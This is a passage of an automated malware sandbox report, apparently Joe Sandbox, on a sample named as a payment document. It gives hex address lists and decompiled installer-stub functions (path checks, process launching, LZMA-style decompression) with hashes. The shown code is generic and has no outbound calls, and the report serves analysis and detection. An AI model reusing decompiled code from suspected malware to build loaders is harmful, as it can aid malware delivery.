0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x0040662a
0x0040662a
0x0040662d
0x00000000
0x00000000
0x00406969
0x0040696d
0x0040698f
0x00406992
0x0040699c
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00000000
0x00406a5d
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00406a1b
0x00406a1b
0x00000000
0x00406a1b
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af1
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406962
0x00406b97
0x00406bb9
0x00406bbf
0x00406bc1
0x00406bc8
0x00000000
0x00000000
0x004061c6
0x00406bce
0x00406bce
0x00000000

Strings

WCMD_ReadAndParseLine, xrefs: 00406184

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID:
String ID: WCMD_ReadAndParseLine
API String ID: 0-1131850939
Opcode ID: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
Instruction ID: a0ed0051221df213f48a7fa37d6c1b626956e64e776f215132b6db312d3b92b6
Opcode Fuzzy Hash: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
Instruction Fuzzy Hash: 10816671D04228DBDF24CFA8C8447ADBBB0FB45301F1181AAD856BB281D7786A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004058CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E004058CF(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405CFB(0x421988, _a4);
				_t21 = E00405882(0x421988);
				if(_t21 != 0) {
					E00405F5D(_t21);
					if(( *0x423f98 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421988;
						while(1) {
							_t11 = lstrlenA(0x421988);
							_push(0x421988);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405FF6();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405835(0x421988);
								continue;
							} else {
								goto L1;
							}
						}
						E004057EE();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x004058db
0x004058e6
0x004058ea
0x004058f1
0x004058fd
0x00405909
0x00405909
0x00405921
0x00405922
0x00405929
0x0040592a
0x00000000
0x00000000
0x0040590d
0x00405914
0x0040591c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405914
0x0040592c
0x00405932
0x00000000
0x00405940
0x004058ff
0x00405903
0x00000000
0x00000000
0x00000000
0x00000000
0x00405903
0x004058ec
0x00000000

APIs

Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08

Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,746AF560,00405634,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 00405890
Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4

lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,746AF560,00405634,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 00405922
GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,746AF560,00405634,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 00405932

Strings

C:\, xrefs: 004058D5, 004058DA, 004058E0, 0040591B, 00405921, 00405929, 00405931

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
Instruction ID: 03f6043ec37f77008ca106ed659fbfe74b4750b5f08ac9da600103de26cb934a
Opcode Fuzzy Hash: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
Instruction Fuzzy Hash: 94F02822509E116AC222333A1C09A9F0A19CE86338714453BFC51B22D2DB3C8D53ED7E

Uniqueness

Uniqueness Score: -1.00%

Function 0040555B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040555B(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422588->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422588,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405564
0x00405580
0x00405588
0x0040558d
0x00000000
0x00405593
0x00405597

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
CloseHandle.KERNEL32(?), ref: 0040558D

Strings

Error launching installer, xrefs: 0040556E

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
Instruction ID: b38bf566800866b301abd826c958dc9a0f2413a88be004d39ffa53c3aefd5702
Opcode Fuzzy Hash: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
Instruction Fuzzy Hash: 29E0ECB4A0020ABBDB109F64ED09A6B7BBDFB14345F808921A914E2150E7B8D9549A69

Uniqueness

Uniqueness Score: -1.00%

Function 00406768 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406768() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406BD6))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
